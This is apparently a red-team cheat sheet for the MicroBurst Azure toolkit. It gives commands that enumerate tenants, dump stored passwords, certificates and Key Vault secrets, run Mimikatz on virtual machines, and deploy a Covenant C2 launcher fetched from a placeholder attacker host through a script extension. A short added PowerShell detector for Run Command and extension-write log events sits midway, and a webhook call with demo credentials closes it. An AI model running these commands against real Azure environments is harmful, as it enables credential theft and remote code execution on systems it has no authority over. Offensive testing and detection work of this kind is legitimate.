MicroBurst
Domain Enumeration (passive):
Subdomain enum:
Invoke-EnumerateAzureSubDomains -Base CLIENT -Verbose
Blob enum:
Invoke-EnumerateAzureBlobs -Base CLIENT -BingAPIKey 00000000001234567899876543210123
Authenticate:
Connect-AzAccount
Credentials:
Gather Passwords:
Get-AzPasswords -Verbose
Cert:
Get-AzurePasswords -Keys N -AppServices N -Verbose
# Then execute the ps file:
AuthenticateAs-XXXXX.ps1
Key Vaults:
Get-AzureKeyVaults-Automation -ExportCerts Y -Subscription "SUBSCRIPTION_NAME" -Verbose | ft -AutoSize
Virtual machines:
Enum:
Get-AzVM | Format-Table -Wrap -AutoSize -Property ResourceGroupName,Name,Location
Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
VM Extensions:
Get-AzureVMExtensionSettings
Get-AzureVMExtensionSettings | Export-CSV -Path C:\tmp\results.csv
Run commands:
Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript
# mimikatz?
Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
# Script extension (gather info from Get-AzureVMExtensionSettings):
Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
# Cleanup
Remove-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName MGITest -Name CovenantScriptExtension
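From the monitoring side, the Run Command and Custom Script Extension calls above are control-plane operations recorded in the Azure Activity Log as `Microsoft.Compute/virtualMachines/runCommand/action` and `Microsoft.Compute/virtualMachines/extensions/write`. The following is an added example, not part of the original notes or of MicroBurst: it filters constructed, simplified log records for those two operations. The helper name, the flat record shape and the approved-caller list are assumptions.

```powershell
# Constructed, simplified Activity Log records (assumed flat shape, not tenant data).
$sampleJson = @'
[
 {"time":"2024-01-10T09:14:02Z","operationName":"Microsoft.Compute/virtualMachines/runCommand/action","caller":"ops-automation@example.invalid","status":"Succeeded","resourceId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/RG-DEMO/providers/Microsoft.Compute/virtualMachines/vm-demo-01"},
 {"time":"2024-01-10T09:20:41Z","operationName":"MICROSOFT.COMPUTE/VIRTUALMACHINES/EXTENSIONS/WRITE","caller":"contractor@example.invalid","status":"Succeeded","resourceId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/RG-DEMO/providers/Microsoft.Compute/virtualMachines/vm-demo-02/extensions/DemoExtension"},
 {"time":"2024-01-10T09:25:10Z","operationName":"Microsoft.Compute/virtualMachines/read","caller":"contractor@example.invalid","status":"Succeeded","resourceId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/RG-DEMO/providers/Microsoft.Compute/virtualMachines/vm-demo-02"},
 {"time":"2024-01-10T09:31:55Z","operationName":"Microsoft.Compute/virtualMachines/runCommand/action","caller":"contractor@example.invalid","status":"Failed","resourceId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/RG-DEMO/providers/Microsoft.Compute/virtualMachines/vm-demo-02"}
]
'@

function Find-VmCodeExecutionEvent {   # hypothetical helper name
    param(
        [Parameter(Mandatory)] [object[]] $Records,
        [string[]] $ApprovedCallers = @()
    )
    # Control-plane operations that run code inside a VM guest.
    $watched = @(
        'Microsoft.Compute/virtualMachines/runCommand/action',
        'Microsoft.Compute/virtualMachines/extensions/write'
    )
    foreach ($r in $Records) {
        # -notcontains compares case-insensitively, so upper-cased exports match too.
        if ($watched -notcontains $r.operationName) { continue }
        # For extension writes the resourceId continues past the VM name; keep only the VM.
        $vm = if ($r.resourceId -match '/virtualMachines/([^/]+)') { $Matches[1] } else { '(unknown)' }
        [pscustomobject]@{
            Time      = $r.time
            Caller    = $r.caller
            VM        = $vm
            Operation = ($r.operationName -split '/', 3)[2]
            Status    = $r.status
            Approved  = $ApprovedCallers -contains $r.caller
        }
    }
}

$logRecords = $sampleJson | ConvertFrom-Json
$hits = Find-VmCodeExecutionEvent -Records $logRecords -ApprovedCallers 'ops-automation@example.invalid'
# Failed attempts are kept: a denied Run Command from an unexpected caller is still a signal.
$hits | Where-Object { -not $_.Approved } | Format-Table -AutoSize
```

Against a live subscription the same filter applies to records returned by Get-AzActivityLog or exported through diagnostic settings, once their fields are mapped to the shape assumed here.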
Triggering a webhook:
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
$AccountInfo = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body